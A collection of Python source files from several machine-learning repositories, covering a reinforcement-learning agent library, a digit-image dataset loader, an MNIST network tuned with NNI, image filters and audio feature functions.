else:
raise NotImplementedError()
logits = self.fc(global_feature)
out_dict = {
'logits': logits,
}
return out_dict
def test():
from common.utils.misc import print_dict
from torch_geometric.data import Data, Batch
model = EdgeConvNet()
print(model)
data = Data(
x=torch.rand(4, 3, 16, 16),
action=torch.randint(3, [1]),
pos=torch.rand(4, 4),
edge_index=torch.tensor([[0, 1, 2, 3], [1, 2, 3, 0]], dtype=torch.int64),
size=torch.tensor([1], dtype=torch.int64),
)
data_batch = Batch.from_data_list([data])
pd_dict = model(data_batch)
print_dict(pd_dict)
loss_dict = model.compute_losses(pd_dict, data_batch)
print_dict(loss_dict)
```
#### File: rl_libarary/agent/BaseAgent.py
```python
import torch
import numpy as np
import torch.multiprocessing as mp
from collections import deque
from skimage.io import imsave
# from ..utils import *
from ..utils.logger import Logger, GlobalLogger
from ..utils.normalizer import build_normalizer
from ..utils.misc import mkdir, close_obj, has_flag
from ..utils.torch_utils import random_seed
import logging
from ..component.envs import Task
from common.utils.checkpoint import CheckpointerV2_RL
from ..network.network_builder import build_network
import pickle
def update_dict_with_key_map(d1, d2, key_map):
for k1, k2 in key_map.items():
if k1 not in d1:
raise Exception('k1 not in d1')
if k2 not in d2:
raise Exception('k2 not in d2')
d1[k1] = d2[k2]
class BaseAgent:
def __init__(self, config):
self.config = config
self.logger = GlobalLogger(logging.getLogger('RL'), config.final_output_dir, 0)
self.task_ind = 0
self.state_normalizer = build_normalizer(config.RL.state_normalizer)
self.reward_normalizer = build_normalizer(config.RL.reward_normalizer)
self.checkpointer = None
self.first_eval = True
def close(self):
close_obj(self.task)
close_obj(self.evaluator)
def lazy_init_checkpointer(self):
if self.checkpointer is None:
self.checkpointer = CheckpointerV2_RL(self.network,
state_normalizer=self.state_normalizer,
optimizer=self.optimizer,
save_dir=self.config.final_output_dir,
logger=self.logger,
max_to_keep=self.config.train.n_checkpoints_to_keep)
def save(self, tag=None):
self.lazy_init_checkpointer()
filename = '{:d}'.format(self.total_steps)
if tag: filename += ('_' + tag)
self.checkpointer.save(filename)
def try_to_load_network(self):
config = self.config
if config.load_ckpt:
self.load(config.load_ckpt)
def load(self, ckpt_path):
self.lazy_init_checkpointer()
self.checkpointer.load(ckpt_path, resume=False, resume_states=False)
def eval_episodes(self):
if self.config.eval.is_async and not self.first_eval:
self.evaluator.query_eval_done() # let the training wait for evaluation
self.first_eval = False
self.evaluator.eval_episodes(self.total_steps)
def record_online_return(self, info, offset=0):
# pass
if isinstance(info, dict):
if 'episodic_return' in info: # wrapped by OriginalReturnWrapper
ret = info['episodic_return']
elif 'episode' in info: # procgen env
ret = info['episode']['r']
else:
return
if ret is not None:
self.logger.add_scalar('episodic_return_train', ret, self.total_steps + offset)
if not has_flag(self.config.train, 'hide_episodic_return'):
self.logger.info('steps %d, episodic_return_train %s' % (self.total_steps + offset, ret))
elif isinstance(info, tuple) or isinstance(info, list):
for i, info_ in enumerate(info):
self.record_online_return(info_, i)
else:
raise NotImplementedError
def switch_task(self):
config = self.config
# if not config.tasks:
if not hasattr(config, 'tasks'):
return
segs = np.linspace(0, config.max_steps, len(config.tasks) + 1)
if self.total_steps > segs[self.task_ind + 1]:
self.task_ind += 1
self.task = config.tasks[self.task_ind]
self.states = self.task.reset()
self.states = config.state_normalizer(self.states)
def record_episode(self, dir, env):
mkdir(dir)
steps = 0
state = env.reset()
while True:
self.record_obs(env, dir, steps)
action = self.record_step(state)
state, reward, done, info = env.step(action)
ret = info[0]['episodic_return']
steps += 1
if ret is not None:
break
def record_step(self, state):
raise NotImplementedError
# For DMControl
def record_obs(self, env, dir, steps):
env = env.env.envs[0]
obs = env.render(mode='rgb_array')
imsave('%s/%04d.png' % (dir, steps), obs)
# from ..component.envs import LazyFrames
class BaseActor(mp.Process):
STEP = 0
RESET = 1
EXIT = 2
SPECS = 3
NETWORK = 4
CACHE = 5
def __init__(self, config, lock):
mp.Process.__init__(self)
self.config = config
self.lock = lock
self.state_normalizer = build_normalizer(config.RL.state_normalizer)
self.__pipe, self.__worker_pipe = mp.Pipe()
self._state = None
self._task = None
self._network = None
self._total_steps = 0
self.__cache_len = 2
if not config.DQN.async_actor:
self.start = lambda: None
self.step = self._sample
self._set_up()
# self._task = self.task_fn()
self._task = self.build_task()
def build_task(self):
config = self.config
return Task(config.task.full_name, **dict(config.other))
def _sample(self):
transitions = []
for _ in range(self.config.DQN.sgd_update_frequency):
transitions.append(self._transition())
return transitions
def run(self):
self._set_up()
config = self.config
# self._task = self.task_fn()
self._task = self.build_task()
if hasattr(self.config.other, 'save_all_experience'):
import h5py
self.h5_data = h5py.File(self.config.other.save_all_experience, mode='w')
cache = deque([], maxlen=2)
while True:
op, data = self.__worker_pipe.recv()
if op == self.STEP:
if not len(cache):
cache.append(self._sample())
cache.append(self._sample())
self.__worker_pipe.send(cache.popleft())
cache.append(self._sample())
elif op == self.EXIT:
self.__worker_pipe.close()
if hasattr(self.config.other, 'save_all_experience'):
self.h5_data.close()
print('@@@@@@@@@@@@@@@@ close h5')
return
elif op == self.NETWORK:
self._network = data
else:
raise NotImplementedError
def _transition(self):
raise NotImplementedError
def _set_up(self):
pass
def step(self):
self.__pipe.send([self.STEP, None])
return self.__pipe.recv()
def close(self):
if self.config.DQN.async_actor:
self.__pipe.send([self.EXIT, None])
self.__pipe.close()
def set_network(self, net):
if not self.config.DQN.async_actor:
self._network = net
else:
self.__pipe.send([self.NETWORK, net])
from ..utils.logger import EvalResultsWriter
class BaseEvaluator(mp.Process):
EVAL = 0
EXIT = 1
NETWORK = 2
# LOG = 3
def __init__(self, config, lock, logger):
mp.Process.__init__(self)
self.config = config
self.lock = lock
self.logger = logger
self.state_normalizer = build_normalizer(config.RL.state_normalizer)
if config.eval.is_async:
self.__pipe, self.__worker_pipe = mp.Pipe()
self.task = None
self.network_outside = None # this is just a handle
self.network = None
else:
self.start = lambda: None
self.close = lambda: None
self.eval_episodes = self._eval_episodes
self._set_up()
# self.task = self.task_fn()
self.task = self.build_task()
self.network = build_network(config)
# self.results_writer = self.results_writer_fn()
self.results_writer = self.build_writer()
def build_task(self):
config = self.config
return Task(config.task.full_name,
num_envs=config.eval.n_episodes if config.eval.parallel else 1,
single_process=not config.eval.env_subprocess,
**dict(config.other))
def build_writer(self):
config = self.config
return EvalResultsWriter('{:s}/eval'.format(config.final_output_dir) if config.final_output_dir else None,
header={'env_id' : config.task.full_name})
def run(self):
self._set_up()
random_seed()
config = self.config
# self.task = self.task_fn()
self.task = self.build_task()
self.network = build_network(config)
# self.results_writer = self.results_writer_fn()
self.results_writer = self.build_writer()
while True:
op, data = self.__worker_pipe.recv()
if op == self.EVAL:
eval_done = self._eval_episodes(data)
self.__worker_pipe.send(eval_done)
# steps, mean, std = self._eval_episodes(data)
# self.__worker_pipe.send((steps, mean, std))
elif op == self.EXIT:
self.__worker_pipe.close()
return
elif op == self.NETWORK:
self.network_outside = data
else:
raise NotImplementedError
def _set_up(self):
pass
def close(self):
self.__pipe.send([self.EXIT, None])
self.__pipe.close()
def set_network(self, net):
if not self.config.eval.is_async:
self.network_outside = net
else:
self.__pipe.send([self.NETWORK, net])
def query_eval_done(self):
eval_done = self.__pipe.recv()
return eval_done
def eval_episodes(self, current_steps):
self.__pipe.send([self.EVAL, current_steps])
def eval_single_episode(self):
env = self.task
state = env.reset()
while True:
action = self.eval_step(state)
state, reward, done, info = env.step(action)
ret = info[0]['episodic_return']
if ret is not None:
break
return ret
def _eval_episodes(self, steps):
with self.lock: # copy the network weight
self.network.load_state_dict(self.network_outside.state_dict())
self.network.eval()
if self.config.eval.parallel:
episodic_returns = self.eval_episode_parallel()
else:
episodic_returns = self.eval_episode_sequential()
# print('@@@@@@@@@@@@@@@@@@@@ eval done')
self.logger.info('steps %d, *** episodic_return_test %.3f (std = %.2f)' % (
steps, np.mean(episodic_returns), np.std(episodic_returns)
))
self.logger.add_scalar('episodic_return_test', np.mean(episodic_returns), steps)
self.results_writer.write_row(steps, episodic_returns)
return True
# return steps, np.mean(episodic_returns), np.std(episodic_returns)
def eval_episode_parallel(self):
episodic_returns = [ None for _ in range(self.config.eval.n_episodes) ]
done_cnt = 0
env = self.task
state = env.reset()
step_cnt = 0
while True:
step_cnt += 1
action = self.eval_step(state)
state, reward, done, info = env.step(action)
for i_env, _info in enumerate(info):
ret = _info['episodic_return']
if episodic_returns[i_env] is None and ret is not None:
episodic_returns[i_env] = ret
done_cnt += 1
if done_cnt >= self.config.eval.n_episodes:
# print('@@@@@@@@ eval step cnt:', step_cnt)
return episodic_returns
def eval_episode_sequential(self):
episodic_returns = []
for ep in range(self.config.eval.n_episodes):
total_rewards = self.eval_single_episode()
episodic_returns.append(np.sum(total_rewards))
return episodic_returns
def eval_step(self, state):
raise NotImplementedError
```
#### File: rl_libarary/network/network_utils.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
# from ..utils import *
class BaseNet:
def __init__(self):
pass
def layer_init(layer, w_scale=1.0):
nn.init.orthogonal_(layer.weight.data)
layer.weight.data.mul_(w_scale)
nn.init.constant_(layer.bias.data, 0)
return layer
def make_mlp(in_channels, mlp_channels, act_builder=nn.ReLU, last_act=True):
c_in = in_channels
module_list = []
for idx, c_out in enumerate(mlp_channels):
module_list.append(nn.Linear(c_in, c_out))
if last_act or idx < len(mlp_channels) - 1:
module_list.append(act_builder())
c_in = c_out
return nn.Sequential(*module_list)
```
#### File: rl_libarary/utils/logger.py
```python
from tensorboardX import SummaryWriter
import os
import os.path as osp
import numpy as np
import torch
import logging
# logging.basicConfig(format='%(asctime)s - %(levelname)s: %(message)s')
import sys
def setup_logger(name, save_dir, comment=''):
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler(stream=sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)s: %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
if save_dir:
filename = 'log'
if comment:
filename += '.' + comment
log_file = os.path.join(save_dir, filename + '.txt')
fh = logging.FileHandler(log_file)
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
logger.addHandler(fh)
return logger
class Logger(object):
def __init__(self, vanilla_logger, log_dir, log_level=0):
self.log_level = log_level
self.writer = None
if vanilla_logger is not None:
self.info = vanilla_logger.info
self.debug = vanilla_logger.debug
self.warning = vanilla_logger.warning
self.all_steps = {}
self.log_dir = log_dir
def lazy_init_writer(self):
if self.log_dir and self.writer is None:
self.writer = SummaryWriter(self.log_dir, flush_secs=30)
def to_numpy(self, v):
if isinstance(v, torch.Tensor):
v = v.cpu().detach().numpy()
return v
def get_step(self, tag):
if tag not in self.all_steps:
self.all_steps[tag] = 0
step = self.all_steps[tag]
self.all_steps[tag] += 1
return step
def add_scalar(self, tag, value, step=None, log_level=0):
if not self.log_dir:
return
self.lazy_init_writer()
if log_level > self.log_level:
return
value = self.to_numpy(value)
if step is None:
step = self.get_step(tag)
if np.isscalar(value):
value = np.asarray([value])
self.writer.add_scalar(tag, value, step)
def add_histogram(self, tag, values, step=None, log_level=0):
if not self.log_dir:
return
self.lazy_init_writer()
if log_level > self.log_level:
return
values = self.to_numpy(values)
if step is None:
step = self.get_step(tag)
self.writer.add_histogram(tag, values, step)
def flush(self):
if not self.log_dir:
return
self.writer.flush()
from tensorboardX import GlobalSummaryWriter
class tmuGlobalSummaryWriter(GlobalSummaryWriter):
def __init__(self, *args, **kwargs):
super(tmuGlobalSummaryWriter, self).__init__(*args, **kwargs)
def add_scalar(self, tag, scalar_value, global_step, walltime=None):
"""add scalar with given global step"""
with self.lock:
self.smw.add_scalar(tag, scalar_value, global_step, walltime)
class GlobalLogger(Logger):
def __init__(self, vanilla_logger, log_dir, log_level=0):
super(GlobalLogger, self).__init__(vanilla_logger, log_dir)
self.add_histogram = None
if log_dir:
self.writer = tmuGlobalSummaryWriter(self.log_dir, flush_secs=30)
# def lazy_init_writer(self):
# if self.log_dir and self.writer is None:
# self.writer = tmuGlobalSummaryWriter.getSummaryWriter(self.log_dir)
def add_scalar(self, tag, value, step=None, log_level=0):
if not self.log_dir:
return
# self.lazy_init_writer()
if log_level > self.log_level:
return
value = self.to_numpy(value)
if step is None:
step = self.get_step(tag)
if np.isscalar(value):
value = np.asarray([value])
self.writer.add_scalar(tag, value, step)
import json, csv
class EvalResultsWriter(object):
def __init__(self, filename, header=''):
if not filename:
return
EXT = 'csv'
if not filename.endswith(EXT):
if osp.isdir(filename):
filename = osp.join(filename, EXT)
else:
filename = filename + "." + EXT
self.f = open(filename, "wt")
if isinstance(header, dict):
header = '# {} \n'.format(json.dumps(header))
self.f.write(header)
self.logger = csv.writer(self.f)
self.logger.writerow(['step', 'ep_rewards'])
self.f.flush()
def write_row(self, step, ep_rewards):
if hasattr(self, 'logger'):
self.logger.writerow([step] + ep_rewards)
self.f.flush()
```
#### File: space/datasets/build.py
```python
from torch.utils.data.sampler import RandomSampler, BatchSampler
from torch.utils.data.dataloader import DataLoader
from common.utils.torch_utils import worker_init_fn
from common.utils.sampler import IterationBasedBatchSampler
def build_dataset(cfg, training=True):
dataset_kwargs = cfg.DATASET.get('TRAIN' if training else 'VAL')
if cfg.DATASET.NAME == 'FallingDigit':
from .falling_digit import FallingDigit
dataset = FallingDigit(to_tensor=True, **dataset_kwargs)
else:
raise ValueError('Unsupported dataset: {}.'.format(cfg.DATASET.NAME))
return dataset
def build_dataloader(cfg, training=True, start_iter=0):
dataset = build_dataset(cfg, training=training)
worker_seed = cfg.RNG_SEED if cfg.RNG_SEED >= 0 else None
if training:
sampler = RandomSampler(dataset, replacement=False)
batch_sampler = BatchSampler(sampler, batch_size=cfg.TRAIN.BATCH_SIZE, drop_last=True)
batch_sampler = IterationBasedBatchSampler(batch_sampler,
num_iterations=cfg.TRAIN.MAX_ITER,
start_iter=start_iter)
dataloader = DataLoader(
dataset,
batch_sampler=batch_sampler,
num_workers=cfg.TRAIN.NUM_WORKERS,
worker_init_fn=lambda worker_id: worker_init_fn(worker_id, base_seed=worker_seed),
)
else:
dataloader = DataLoader(
dataset,
batch_size=cfg.VAL.BATCH_SIZE,
shuffle=True, # For visualization
# shuffle=False,
drop_last=False,
num_workers=cfg.VAL.NUM_WORKERS,
worker_init_fn=lambda worker_id: worker_init_fn(worker_id, base_seed=worker_seed),
)
return dataloader
```
#### File: space/datasets/falling_digit.py
```python
import pickle
import numpy as np
import cv2
import torch
from torch.utils.data.dataset import Dataset
import warnings
class FallingDigit(Dataset):
def __init__(self, path, start=0, end=-1, image_size=(128, 128), transform=None, to_tensor=True):
self.path = path
with open(path, 'rb') as f:
self.data = pickle.load(f)
self.data = self.data[start:(None if end == -1 else end)]
self.image_size = image_size
assert isinstance(image_size, tuple)
self.transform = transform # data augmentation
self.to_tensor = to_tensor
def __getitem__(self, index):
data = self.data[index]
if 'image' in data:
image = data['image']
else:
image = data['original_image']
assert image.dtype == np.uint8
# resize if necessary
if image.shape[:2] != self.image_size:
warnings.warn('Resize image from {} to {}'.format(image.shape, self.image_size))
image = cv2.resize(image, self.image_size[::-1], interpolation=cv2.INTER_AREA)
if self.transform is not None:
image_pil = self.transform(image)
image = np.asarray(image_pil)
assert image.dtype == np.uint8
image = np.asarray(image, dtype=np.float32) / 255.
if self.to_tensor:
image = np.transpose(image, [2, 0, 1]) # (c, h, w)
image = torch.tensor(image, dtype=torch.float32)
out_dict = {
'image': image,
}
return out_dict
def __len__(self):
return len(self.data)
def __str__(self):
return '{:s}: {:d} images.'.format(self.__class__.__name__, len(self))
def test():
import os.path as osp
from space.utils.plt_utils import show_image
_ROOT_DIR = osp.join(osp.dirname(__file__), '../..')
path = osp.join(_ROOT_DIR, 'data/falling_digit/FallingDigit_3-v0_n_72000_lv_0_to_3000_from_gt_policy.pkl')
dataset = FallingDigit(path, to_tensor=False)
for i in range(0, 10):
data = dataset[i]
image = data['image']
show_image(image)
```
#### File: policy-refactorization/tools/collect_demo_dataset_for_falling_digit.py
```python
from __future__ import division
import os
import os.path as osp
import argparse
import pickle
from tqdm import tqdm
import numpy as np
import random
# import torch
import cv2
import sys
_ROOT_DIR = osp.abspath(osp.dirname(__file__) + '/..')
sys.path.insert(0, _ROOT_DIR)
from rl_libarary.utils.config import generate_eval_config
from rl_libarary.agent.DQN_agent import DQNAgent
from rl_libarary.component.envs import Task
class EnvDataProvider(object):
def __init__(self, env_name, ckpt, config_file, args):
self.args = args
self.config = generate_eval_config(config_file, env_name)
self.agent = DQNAgent(self.config)
self.agent.load(ckpt)
self.agent.evaluator.network.load_state_dict(self.agent.network.state_dict())
self.env = self.agent.evaluator.task.env.envs[0].env # this env only transpose image
def get_episode(self, level_idx):
ep_data = []
s = self.env.reset(chosen_level_idx=level_idx) # must passed by kwargs
tot_rewards = 0
done = False
while not done:
original_img = self.env.render(mode='rgb_array') # (128, 128, 3)
q = self.agent.evaluator.eval_q([s])
ep_data.append({ 'original_image': original_img, # (128, 128, 3) of uint8
'q': q, # (3, ) of float32
})
if self.args.vis:
cv2.imshow('game', original_img[:, :, ::-1]) # convert RGB to BGR
cv2.waitKey(1)
aaaa = input()
if done:
# print('ep_r:', tot_rewards)
break
s, r, done, _ = self.env.step(np.argmax(q))
tot_rewards += r
if tot_rewards >= self.args.reward_th:
return ep_data
else:
return None
def close(self):
self.agent.close()
def parse_args():
parser = argparse.ArgumentParser(description='abc')
parser.add_argument(
'--cfg',
dest='config_file',
default='',
metavar='FILE',
help='path to config file',
type=str,
required=True,
)
parser.add_argument('--output-dir', default=osp.join(osp.dirname(__file__), '../data'),
type=str, help='output directory')
parser.add_argument('--vis', action='store_true', help='whether to visualize')
parser.add_argument('--env', type=str, required=True)
parser.add_argument('--ckpt', type=str, required=True)
parser.add_argument('--comment', type=str)
parser.add_argument('--reward-th', default=2.99, type=float)
parser.add_argument('--start_level', default=0, type=int)
parser.add_argument('--num_levels', default=3000, type=int)
args = parser.parse_args()
return args
def main():
"""
python tools/collect_demo_dataset_for_falling_digit.py --env FallingDigitCIFAR_3-v1 --cfg configs/falling_digit_rl/dqn_relation_net_eval.yml --ckpt
"""
args = parse_args()
e = EnvDataProvider(env_name=args.env, ckpt=args.ckpt, config_file=args.config_file, args=args)
results = []
for i in tqdm(range(args.start_level, args.start_level + args.num_levels)):
ep_data = e.get_episode(i)
if ep_data is not None:
results += ep_data
e.close()
output_dir = args.output_dir
os.makedirs(output_dir, exist_ok=True)
output_path = osp.join(output_dir, '{:s}_n_{:d}{:s}.pkl'.format(
args.env, len(results),
'_' + args.comment if args.comment else ''))
print(output_path)
with open(output_path, 'wb') as f:
pickle.dump(results, f, protocol=pickle.HIGHEST_PROTOCOL)
if __name__ == "__main__":
main()
``` |
{
"source": "jiayuanlu/MSRA",
"score": 3
} |
#### File: Lab 2/FNN/mnist_FNN.py
```python
from __future__ import print_function
import argparse
import torch
# torch.cuda.set_device(0)
import nni
import logging
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torchvision
from torchvision import datasets, transforms
from torch.optim.lr_scheduler import StepLR
criterion = nn.CrossEntropyLoss()
import numpy as np
import torchvision.models as models
from torch.utils.tensorboard import SummaryWriter
from nni.utils import merge_parameter
writer = SummaryWriter('logs/mnist_experiment_1')
logger = logging.getLogger('mnist_AutoML')
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
# prelu=nn.PReLU(num_parameters=1)
# self.dropout1 = nn.Dropout2d(0.25)
self.in_hid_1= nn.Linear(784, 512)
self.hid1=nn.LeakyReLU()
self.in_hid_2= nn.Linear(512, 256)
self.hid2=nn.LeakyReLU()
self.in_hid_3= nn.Linear(256, 128)
self.hid3=nn.LeakyReLU()
self.hid_out=nn.Linear(128,10)
def forward(self, data):
x = data.view(-1, 784)
output=self.in_hid_1(x)
# output=self.dropout1(output)
output=self.hid1(output)
output=self.in_hid_2(output)
output=self.hid2(output)
output=self.in_hid_3(output)
output=self.hid3(output)
output=self.hid_out(output)
output = F.log_softmax(output, dim=1)
return output
def train(args, model, device, train_loader, optimizer, epoch):
model.train()
running_loss = 0.0
correct = 0.0
for batch_idx, (data, target) in enumerate(train_loader):
data, target = data.to(device), target.to(device)
optimizer.zero_grad()
output = model(data)
loss = criterion(output, target)
loss.backward()
optimizer.step()
running_loss += loss.item()
pred = output.argmax(dim=1, keepdim=True)
correct += pred.eq(target.view_as(pred)).sum().item()
if batch_idx % args['log_interval'] == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.item()))
if batch_idx != 0:
global_step = (epoch - 1) * len(train_loader) + batch_idx
writer.add_scalar('Loss/train', running_loss / (args['batch_size'] * args['log_interval']), global_step)
writer.add_scalar('Accuracy/train', 100. * correct / (args['batch_size'] * args['log_interval']), global_step)
running_loss = 0.0
correct = 0.0
def test(model, device, test_loader):
model.eval()
test_loss = 0
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.to(device), target.to(device)
output = model(data)
test_loss += criterion(output, target).item()
pred = output.argmax(dim=1, keepdim=True)
correct += pred.eq(target.view_as(pred)).sum().item()
test_loss /= len(test_loader.dataset)
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
test_loss, correct, len(test_loader.dataset),
100. * correct / len(test_loader.dataset)))
def profile(model, device, train_loader):
dataiter = iter(train_loader)
data, target = dataiter.next()
data, target = data.to(device), target.to(device)
with torch.autograd.profiler.profile(use_cuda=False) as prof:
model(data[0].reshape(1,1,28,28))
print(prof)
def main():
torch.backends.cudnn.enabled = False ###
parser = argparse.ArgumentParser(description='PyTorch MNIST Example')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',
help='input batch size for testing (default: 1000)')
parser.add_argument('--epochs', type=int, default=14, metavar='N',
help='number of epochs to train (default: 14)')
parser.add_argument('--lr', type=float, default=1.0, metavar='LR',
help='learning rate (default: 1.0)')
parser.add_argument('--gamma', type=float, default=0.7, metavar='M',
help='Learning rate step gamma (default: 0.7)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=10, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--save-model', action='store_true', default=True,
help='For Saving the current Model')
args = parser.parse_args()
# use_cuda = not args.no_cuda and torch.cuda.is_available()
# torch.manual_seed(args.seed)
# device = torch.device("cuda" if use_cuda else "cpu")
# kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}
# train_loader = torch.utils.data.DataLoader(
# datasets.MNIST('data', train=True, download=True,
# transform=transforms.Compose([
# transforms.ToTensor(),
# transforms.Normalize((0.1307,), (0.3081,))
# ])),
# batch_size=args.batch_size, shuffle=True, **kwargs)
# test_loader = torch.utils.data.DataLoader(
# datasets.MNIST('data', train=False, transform=transforms.Compose([
# transforms.ToTensor(),
# transforms.Normalize((0.1307,), (0.3081,))
# ])),
# batch_size=args.test_batch_size, shuffle=True, **kwargs)
# dataiter = iter(train_loader)
# images, labels = dataiter.next()
# grid = torchvision.utils.make_grid(images)
# writer.add_image('images', grid, 0)
# model = Net().to(device)
# optimizer = optim.Adadelta(model.parameters(), lr=args.lr)
# images=images.to(device)
# writer.add_graph(model, images)
# scheduler = StepLR(optimizer, step_size=1, gamma=args.gamma)
# print("Start profiling...")
# profile(model, device, train_loader)
# print("Finished profiling.")
# for epoch in range(1, args.epochs + 1):
# train(args, model, device, train_loader, optimizer, epoch)
# test_acc=test(model, device, test_loader)
# scheduler.step()
# # report intermediate result
# nni.report_intermediate_result(test_acc)
# logger.debug('test accuracy %g', test_acc)
# logger.debug('Pipe send intermediate result done.')
# # report final result
# nni.report_final_result(test_acc)
# if args.save_model:
# print("Our model: \n\n", model, '\n')
# print("The state dict keys: \n\n", model.state_dict().keys())
# torch.save(model.state_dict(), "mnist.pt")
# state_dict = torch.load('mnist.pt')
# print(state_dict.keys())
# writer.close()
return args
def NNI(args):
# use_cuda = not args.no_cuda and torch.cuda.is_available()
use_cuda = not args['no_cuda'] and torch.cuda.is_available()
# torch.manual_seed(args.seed)
torch.manual_seed(args['seed'])
device = torch.device("cuda" if use_cuda else "cpu")
kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}
train_loader = torch.utils.data.DataLoader(
datasets.MNIST('data', train=True, download=True,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])),
batch_size=args['batch_size'], shuffle=True, **kwargs)
test_loader = torch.utils.data.DataLoader(
datasets.MNIST('data', train=False, transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])),
batch_size=args['test_batch_size'], shuffle=True, **kwargs)
dataiter = iter(train_loader)
images, labels = dataiter.next()
grid = torchvision.utils.make_grid(images)
writer.add_image('images', grid, 0)
model = Net().to(device)
optimizer = optim.Adadelta(model.parameters(), lr=args['lr'])
images=images.to(device)
writer.add_graph(model, images)
scheduler = StepLR(optimizer, step_size=1, gamma=args['gamma'])#等间隔调整学习率 StepLR, 将学习率调整为 lr*gamma
print("Start profiling...")
profile(model, device, train_loader)
print("Finished profiling.")
for epoch in range(1, args['epochs'] + 1):
train(args, model, device, train_loader, optimizer, epoch)
test_acc=test(model, device, test_loader)
scheduler.step()
nni.report_intermediate_result(test_acc)
logger.debug('test accuracy %g', test_acc)
logger.debug('Pipe send intermediate result done.')
nni.report_final_result(test_acc)
if args['save_model']:
print("Our model: \n\n", model, '\n')
print("The state dict keys: \n\n", model.state_dict().keys())
torch.save(model.state_dict(), "mnist.pt")
state_dict = torch.load('mnist.pt')
print(state_dict.keys())
writer.close()
if __name__ == '__main__':
tuner_params = nni.get_next_parameter()
logger.debug(tuner_params)
params = vars(merge_parameter(main(), tuner_params))
print(params)
NNI(params)
``` |
{
"source": "jiayuanlu/XJTU_course",
"score": 2
} |
#### File: Homework1/2D_Gauss_Filter/1_4.py
```python
import numpy as np
from scipy import signal
import cv2
import random
import math
#双边滤波
def getClosenessWeight(sigma_g,H,W):
r,c=np.mgrid[0:H:1,0:W:1]
r -= (H - 1) // 2
c -= int(W - 1) // 2
closeWeight=np.exp(-0.5*(np.power(r,2)+np.power(c,2))/math.pow(sigma_g,2))
return closeWeight
def bfltGray(I,H,W,sigma_g,sigma_d):
#构建空间距离权重模板
closenessWeight=getClosenessWeight(sigma_g,H,W)
#模板的中心点位置
cH = (H - 1) // 2 #//表示整数除法
cW = (W - 1) // 2
#图像矩阵的行数和列数
rows,cols=I.shape
#双边滤波后的结果
bfltGrayImage=np.zeros(I.shape,np.float32)
for r in range(rows):
for c in range(cols):
pixel=I[r][c]
#判断边界
rTop=0 if r-cH<0 else r-cH
rBottom=rows-1 if r+cH>rows-1 else r+cH
cLeft=0 if c-cW<0 else c-cW
cRight=cols-1 if c+cW>cols-1 else c+cW
# 权重模板作用的区域
region=I[rTop:rBottom+1,cLeft:cRight+1]
#构建灰度值相似性的权重因子
similarityWeightTemp=np.exp(-0.5*np.power(region-pixel,2.0)/math.pow(sigma_d,2))
#similarityWeightTemp = np.exp(-0.5 * np.power(region - pixel, 2.0) / math.pow(sigma_d, 2))
closenessWeightTemp=closenessWeight[rTop-r+cH:rBottom-r+cH+1,cLeft-c+cW:cRight-c+cW+1]
#两个权重模板相乘
weightTemp=similarityWeightTemp*closenessWeightTemp
#归一化权重模板
weightTemp=weightTemp/np.sum(weightTemp)
#权重模板和对应的领域值相乘求和
bfltGrayImage[r][c]=np.sum(region*weightTemp)
return bfltGrayImage
if __name__=='__main__': ##启动语句
a= cv2.imread('8.jpeg', cv2.IMREAD_UNCHANGED) # 路径名中不能有中文,会出错,cv2.
image1 = cv2.split(a)[0]#蓝通道
cv2.imshow("8_after1.png",image1)
image1=image1/255.0
#双边滤波
bfltImage=bfltGray(image1,3,3,19,0.2)
cv2.imshow("增强后图",bfltImage)
cv2.waitKey(0)
cv2.destroyAllWindows()
```
#### File: CVPR/Homework2/grad.py
```python
from PIL import Image
from numpy import *
import matplotlib.pyplot as plt
from scipy.ndimage import filters
im = array(Image.open('1.jpeg').convert('L'))
# im = array(Image.open('1.jpeg'))
sigma = 7 # 标准差
imx = zeros(im.shape)
filters.gaussian_filter(im, (sigma, sigma), (0, 1), imx)
imy = zeros(im.shape)
filters.gaussian_filter(im, (sigma, sigma), (1, 0), imy)
plt.subplot(1, 3, 1)
plt.axis('off')
plt.imshow(im, plt.cm.gray)
plt.imsave('Gauss_g1_7.jpg',im)
plt.subplot(1, 3, 2)
plt.axis('off')
plt.imshow(imx, plt.cm.gray)
plt.imsave('Gauss_gx_7.jpg',imx)
plt.subplot(1, 3, 3)
plt.axis('off')
plt.imshow(imy, plt.cm.gray)
plt.imsave('Gauss_gy_7.jpg',imy)
plt.show()
```
#### File: DSP/pinyu_mfcc/feature.py
```python
import numpy as np
from python_speech_features import mfcc
def averageEnergy(frames):
energy = np.average(frames * frames, axis=1)
return energy.reshape(-1)
def zeroCrossingRate(frames):
_, lens = frames.shape
delta = np.abs(np.sign(frames[:, 1:]) - np.sign(frames[:, :lens - 1]))
zeroCrossingRate = np.average(delta / 2, axis=1)
return zeroCrossingRate.reshape(-1)
def std(frames):
return np.std(frames, axis=1).reshape(-1)
def kurt(frames):
maximum = np.max(frames, axis=1)
rms = np.sqrt(averageEnergy(frames)) + 1e-6
return (maximum / rms).reshape(-1)
def wave(frames):
rms = np.sqrt(averageEnergy(frames)) + 1e-6
mean = np.average(frames, axis=1)
mean[abs(mean) < 1e-6] = 1e-6
return (rms / mean).reshape(-1)
